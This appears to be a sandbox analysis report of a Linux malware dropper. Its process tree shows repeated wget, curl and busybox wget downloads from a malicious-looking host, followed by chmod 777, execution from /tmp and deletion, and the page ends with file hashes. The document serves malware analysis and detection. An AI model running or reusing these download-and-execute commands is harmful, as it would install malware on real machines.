/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- System Network Configuration Discovery
PID:947
-
-
/bin/chmodchmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- File and Directory Permissions Modification
PID:948
-
-
/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵
- Executes dropped EXE
PID:949
-
-
/bin/rmrm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ2⤵PID:950
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵PID:951
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:952
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- System Network Configuration Discovery
PID:954
-
-
/bin/chmodchmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵PID:957
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵
- System Network Configuration Discovery
PID:958
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵
- System Network Configuration Discovery
PID:961
-
-
/bin/chmodchmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht2⤵PID:964
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵PID:965
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- System Network Configuration Discovery
PID:968
-
-
/bin/chmodchmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO2⤵PID:971
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- System Network Configuration Discovery
PID:972
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- System Network Configuration Discovery
PID:975
-
-
/bin/chmodchmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵PID:978
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵
- System Network Configuration Discovery
PID:979
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵
- System Network Configuration Discovery
PID:982
-
-
/bin/chmodchmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj2⤵PID:985
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- System Network Configuration Discovery
PID:986
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵PID:989
-
-
/bin/chmodchmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p2⤵PID:992
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- System Network Configuration Discovery
PID:993
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- System Network Configuration Discovery
PID:996
-
-
/bin/chmodchmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf2⤵PID:999
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- System Network Configuration Discovery
PID:1000
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- System Network Configuration Discovery
PID:1003
-
-
/bin/chmodchmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O./lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm lAKMISeUV2PhSu0DN3bVycJibusAQif91O2⤵PID:1006
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97